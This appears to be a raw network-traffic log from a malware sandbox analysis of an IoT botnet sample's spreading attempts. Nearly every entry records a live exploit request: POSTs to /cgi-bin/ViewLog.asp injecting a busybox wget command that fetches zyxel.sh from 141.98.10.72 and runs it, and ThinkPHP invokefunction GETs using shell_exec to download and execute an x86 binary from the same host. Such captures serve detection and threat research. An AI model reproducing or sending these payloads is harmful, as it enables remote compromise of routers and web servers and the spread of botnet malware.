                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:34.550674915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      469192.168.2.155052294.122.107.2338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:58.858814001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      470192.168.2.154665685.133.222.448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:58.893605947 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      471192.168.2.155398694.187.234.2158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:58.924550056 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:59.265953064 CET21INHTTP/1.1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      472192.168.2.155410294.122.24.1738080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:59.442934990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      473192.168.2.155172694.120.102.948080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:59.443073034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      474192.168.2.154853294.111.253.2048080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:59.626667976 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      475192.168.2.153840262.29.127.1918080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:59.660171986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      476192.168.2.155504294.123.126.1658080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:59.660303116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      477192.168.2.155257894.187.235.968080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:59.756983995 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      478192.168.2.155104288.216.129.12280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:00.863591909 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:00.982633114 CET501INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:04 GMT
                                                      Server: Apache/2.4.54 (Debian)
                                                      Content-Length: 307
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 36 35 2e 31 39 36 2e 31 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Debian) Server at 107.165.196.135 Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      479192.168.2.155516488.221.226.6480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:00.960732937 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:01.177041054 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:01 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:01 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 31 26 23 34 36 3b 31 65 34 37 36 31 31 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;ad9b1702&#46;1707899401&#46;1e47611a</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      480192.168.2.155063088.63.12.22380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:00.971656084 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:01.201355934 CET89INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 3c
                                                      Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>404 Not Found</H1><HR></BODY></HTML>
                                                      Feb 14, 2024 09:30:04.343911886 CET89INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 3c
                                                      Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>404 Not Found</H1><HR></BODY></HTML>
                                                      Feb 14, 2024 09:30:10.343949080 CET89INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 3c
                                                      Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>404 Not Found</H1><HR></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      481192.168.2.153963294.140.0.2098080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.216727972 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      482192.168.2.155744831.208.62.788080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.324991941 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      483192.168.2.154344294.240.183.2248080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.335563898 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.585225105 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.025226116 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:07.001035929 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:12.888859987 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.408663988 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:47.447901964 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:34.550816059 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      484192.168.2.154444694.122.59.2078080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.348880053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      485192.168.2.155086831.136.6.2378080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.546916962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.233261108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
